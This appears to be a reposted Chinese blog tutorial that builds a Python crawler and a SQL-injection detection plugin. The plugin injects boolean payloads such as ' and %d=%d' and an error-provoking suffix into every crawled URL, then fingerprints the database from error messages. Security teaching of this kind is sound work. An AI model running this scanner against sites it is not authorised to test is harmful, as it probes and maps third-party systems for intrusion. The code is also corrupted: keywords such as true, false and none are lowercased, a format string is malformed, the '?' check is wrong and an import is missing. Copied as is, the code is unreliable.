当前位置:脚本大全 > > 正文

python sql注入怎么避免(Python实现SQL注入检测插件实例代码)

时间:2022-03-31 00:48:07类别:脚本大全

python sql注入怎么避免

Python实现SQL注入检测插件实例代码

扫描器需要实现的功能思维导图

python sql注入怎么避免(Python实现SQL注入检测插件实例代码)

爬虫编写思路

首先需要开发一个爬虫用于收集网站的链接,爬虫需要记录已经爬取的链接和待爬取的链接,并且去重,用 python 的set()就可以解决,大概流程是:

sql 判断思路

mysql 中是 sql syntax.*mysql
microsoft sql server 是 warning.*mssql_
microsoft access 是 microsoft access driver
oracle 是 oracle error
ibm db2 是 db2 sql error
sqlite 是 sqlite.exception
...

通过这些关键词就可以判断出所用的数据库

请安装这些库

  • ?
  • 1
  • 2
  • pip install requests
  • pip install beautifulsoup4
  • 实验环境是 linux,创建一个code目录,在其中创建一个work文件夹,将其作为工作目录

    目录结构

    /w8ay.py  // 项目启动主文件
    /lib/core // 核心文件存放目录
    /lib/core/config.py // 配置文件
    /script   // 插件存放
    /exp      // exp和poc存放

    步骤

    sql 检测脚本编写

  • ?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • dbms_errors = {
  •   'mysql': (r"sql syntax.*mysql", r"warning.*mysql_.*", r"valid mysql result", r"mysqlclient\."),
  •   "postgresql": (r"postgresql.*error", r"warning.*\wpg_.*", r"valid postgresql result", r"npgsql\."),
  •   "microsoft sql server": (r"driver.* sql[\-\_\ ]*server", r"ole db.* sql server", r"(\w|\a)sql server.*driver", r"warning.*mssql_.*", r"(\w|\a)sql server.*[0-9a-fa-f]{8}", r"(?s)exception.*\wsystem\.data\.sqlclient\.", r"(?s)exception.*\wroadhouse\.cms\."),
  •   "microsoft access": (r"microsoft access driver", r"jet database engine", r"access database engine"),
  •   "oracle": (r"\bora-[0-9][0-9][0-9][0-9]", r"oracle error", r"oracle.*driver", r"warning.*\woci_.*", r"warning.*\wora_.*"),
  •   "ibm db2": (r"cli driver.*db2", r"db2 sql error", r"\bdb2_\w+\("),
  •   "sqlite": (r"sqlite/jdbcdriver", r"sqlite.exception", r"system.data.sqlite.sqliteexception", r"warning.*sqlite_.*", r"warning.*sqlite3::", r"\[sqlite_error\]"),
  •   "sybase": (r"(?i)warning.*sybase.*", r"sybase message", r"sybase.*server message.*"),
  • }
  • 通过正则表达式就可以判断出是哪个数据库了

  • ?
  • 1
  • 2
  • 3
  • for (dbms, regex) in ((dbms, regex) for dbms in dbms_errors for regex in dbms_errors[dbms]):
  •   if (re.search(regex,_content)):
  •     return true
  • 下面是我们测试语句的payload

  • ?
  • 1
  • boolean_tests = (" and %d=%d", " or not (%d=%d)")
  • 用报错语句返回正确的内容和错误的内容进行对比

  • ?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • for test_payload in boolean_tests:
  •   # right page
  •   randint = random.randint(1, 255)
  •   _url = url + test_payload % (randint, randint)
  •   content["true"] = downloader.get(_url)
  •   _url = url + test_payload % (randint, randint + 1)
  •   content["false"] = downloader.get(_url)
  •   if content["origin"] == content["true"] != content["false"]:
  •     return "sql found: %" % url
  • 这句

  • ?
  • 1
  • content["origin"] == content["true"] != content["false"]
  • 意思就是当原始网页等于正确的网页不等于错误的网页内容时,就可以判定这个地址存在注入漏洞

    完整代码:

  • ?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • import re, random
  • from lib.core import download
  • def sqlcheck(url):
  •   if (not url.find("?")): # pseudo-static page
  •     return false;
  •   downloader = download.downloader()
  •   boolean_tests = (" and %d=%d", " or not (%d=%d)")
  •   dbms_errors = {
  •     # regular expressions used for dbms recognition based on error message response
  •     "mysql": (r"sql syntax.*mysql", r"warning.*mysql_.*", r"valid mysql result", r"mysqlclient\."),
  •     "postgresql": (r"postgresql.*error", r"warning.*\wpg_.*", r"valid postgresql result", r"npgsql\."),
  •     "microsoft sql server": (r"driver.* sql[\-\_\ ]*server", r"ole db.* sql server", r"(\w|\a)sql server.*driver", r"warning.*mssql_.*", r"(\w|\a)sql server.*[0-9a-fa-f]{8}", r"(?s)exception.*\wsystem\.data\.sqlclient\.", r"(?s)exception.*\wroadhouse\.cms\."),
  •     "microsoft access": (r"microsoft access driver", r"jet database engine", r"access database engine"),
  •     "oracle": (r"\bora-[0-9][0-9][0-9][0-9]", r"oracle error", r"oracle.*driver", r"warning.*\woci_.*", r"warning.*\wora_.*"),
  •     "ibm db2": (r"cli driver.*db2", r"db2 sql error", r"\bdb2_\w+\("),
  •     "sqlite": (r"sqlite/jdbcdriver", r"sqlite.exception", r"system.data.sqlite.sqliteexception", r"warning.*sqlite_.*", r"warning.*sqlite3::", r"\[sqlite_error\]"),
  •     "sybase": (r"(?i)warning.*sybase.*", r"sybase message", r"sybase.*server message.*"),
  •   }
  •   _url = url + "%29%28%22%27"
  •   _content = downloader.get(_url)
  •   for (dbms, regex) in ((dbms, regex) for dbms in dbms_errors for regex in dbms_errors[dbms]):
  •     if (re.search(regex,_content)):
  •       return true
  •   content = {}
  •   content['origin'] = downloader.get(_url)
  •   for test_payload in boolean_tests:
  •     # right page
  •     randint = random.randint(1, 255)
  •     _url = url + test_payload % (randint, randint)
  •     content["true"] = downloader.get(_url)
  •     _url = url + test_payload % (randint, randint + 1)
  •     content["false"] = downloader.get(_url)
  •     if content["origin"] == content["true"] != content["false"]:
  •       return "sql found: %" % url
  • 将这个文件命名为sqlcheck.py,放在/script目录中。代码的第 4 行作用是查找 url 是否包含?,如果不包含,比方说伪静态页面,可能不太好注入,因此需要过滤掉

    爬虫的编写

    爬虫的思路上面讲过了,先完成 url 的管理,我们单独将它作为一个类,文件保存在/lib/core/urlmanager.py

  • ?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • #-*- coding:utf-8 -*-
  •  
  • class urlmanager(object):
  •   def __init__(self):
  •     self.new_urls = set()
  •     self.old_urls = set()
  •     
  •   def add_new_url(self, url):
  •     if url is none:
  •       return
  •     if url not in self.new_urls and url not in self.old_urls:
  •       self.new_urls.add(url)
  •    
  •   def add_new_urls(self, urls):
  •     if urls is none or len(urls) == 0:
  •       return
  •     for url in urls:
  •       self.add_new_url(url)
  •     
  •   def has_new_url(self):
  •     return len(self.new_urls) != 0
  •    
  •   def get_new_url(self):
  •     new_url = self.new_urls.pop()
  •     self.old_urls.add(new_url)
  •     return new_url
  • 为了方便,我们也将下载功能单独作为一个类使用,文件保存在lib/core/downloader.py

  • ?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • #-*- coding:utf-8 -*-
  • import requests
  •  
  • class downloader(object):
  •   def get(self, url):
  •     r = requests.get(url, timeout = 10)
  •     if r.status_code != 200:
  •       return none
  •     _str = r.text
  •     return _str
  •   
  •   def post(self, url, data):
  •     r = requests.post(url, data)
  •     _str = r.text
  •     return _str
  •   
  •   def download(self, url, htmls):
  •     if url is none:
  •       return none
  •     _str = {}
  •     _str["url"] = url
  •     try:
  •       r = requests.get(url, timeout = 10)
  •       if r.status_code != 200:
  •         return none
  •       _str["html"] = r.text
  •     except exception as e:
  •       return none
  •     htmls.append(_str)
  • 特别说明,因为我们要写的爬虫是多线程的,所以类中有个download方法是专门为多线程下载专用的

    在lib/core/spider.py中编写爬虫

  • ?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • 57
  • 58
  • 59
  • 60
  • 61
  • 62
  • 63
  • 64
  • 65
  • #-*- coding:utf-8 -*-
  •  
  • from lib.core import downloader, urlmanager
  • import threading
  • from urllib import parse
  • from urllib.parse import urljoin
  • from bs4 import beautifulsoup
  •  
  • class spidermain(object):
  •   def __init__(self, root, threadnum):
  •     self.urls = urlmanager.urlmanager()
  •     self.download = downloader.downloader()
  •     self.root = root
  •     self.threadnum = threadnum
  •   
  •   def _judge(self, domain, url):
  •     if (url.find(domain) != -1):
  •       return true
  •     return false
  •   
  •   def _parse(self, page_url, content):
  •     if content is none:
  •       return
  •     soup = beautifulsoup(content, 'html.parser')
  •     _news = self._get_new_urls(page_url, soup)
  •     return _news
  •     
  •   def _get_new_urls(self, page_url, soup):
  •     new_urls = set()
  •     links = soup.find_all('a')
  •     for link in links:
  •       new_url = link.get('href')
  •       new_full_url = urljoin(page_url, new_url)
  •       if (self._judge(self.root, new_full_url)):
  •         new_urls.add(new_full_url)
  •     return new_urls
  •     
  •   def craw(self):
  •     self.urls.add_new_url(self.root)
  •     while self.urls.has_new_url():
  •       _content = []
  •       th = []
  •       for i in list(range(self.threadnum)):
  •         if self.urls.has_new_url() is false:
  •           break
  •         new_url = self.urls.get_new_url()
  •         
  •         ## sql check
  •         try:
  •           if (sqlcheck.sqlcheck(new_url)):
  •             print("url:%s sqlcheck is valueable" % new_url)
  •         except:
  •           pass
  •             
  •         print("craw:" + new_url)
  •         t = threading.thread(target = self.download.download, args = (new_url, _content))
  •         t.start()
  •         th.append(t)
  •       for t in th:
  •         t.join()
  •       for _str in _content:
  •         if _str is none:
  •           continue
  •         new_urls = self._parse(new_url, _str["html"])
  •         self.urls.add_new_urls(new_urls)
  • 爬虫通过调用craw()方法传入一个网址进行爬行,然后采用多线程的方法下载待爬行的网站,下载之后的源码用_parse方法调用beautifulsoup进行解析,之后将解析出的 url 列表丢入 url 管理器,这样循环,最后只要爬完了网页,爬虫就会停止

    threading库可以自定义需要开启的线程数,线程开启后,每个线程会得到一个 url 进行下载,然后线程会阻塞,阻塞完毕后线程放行

    爬虫和 sql 检查的结合

    在lib/core/spider.py文件引用一下from script import sqlcheck,在craw()方法中,取出新的 url 地方调用一下

  • ?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • ##sql check
  • try:
  •   if(sqlcheck.sqlcheck(new_url)):
  •     print("url:%s sqlcheck is valueable"%new_url)
  • except:
  •   pass
  • 用try检测可能出现的异常,绕过它,在文件w8ay.py中进行测试

  • ?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • #-*- coding:utf-8 -*-
  • '''
  • name: w8ayscan
  • author: mathor
  • copyright (c) 2019
  • '''
  • import sys
  • from lib.core.spider import spidermain
  • def main():
  •   root = "https://wmathor.com"
  •   threadnum = 50
  •   w8 = spidermain(root, threadnum)
  •   w8.craw()
  •  
  • if __name__ == "__main__":
  •   main()
  • 很重要的一点!为了使得lib和script文件夹中的.py文件可以可以被认作是模块,请在lib、lib/core和script文件夹中创建__init__.py文件,文件中什么都不需要写

    总结

    sql 注入检测通过一些payload使页面出错,判断原始网页,正确网页,错误网页即可检测出是否存在 sql 注入漏洞
    通过匹配出 sql 报错出来的信息,可以正则判断所用的数据库

    好了,以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,如果有疑问大家可以留言交流,谢谢大家对开心学习网的支持。

    原文链接:https://www.wmathor.com/index.php/archives/1191/

    上一篇下一篇

    猜您喜欢

    热门推荐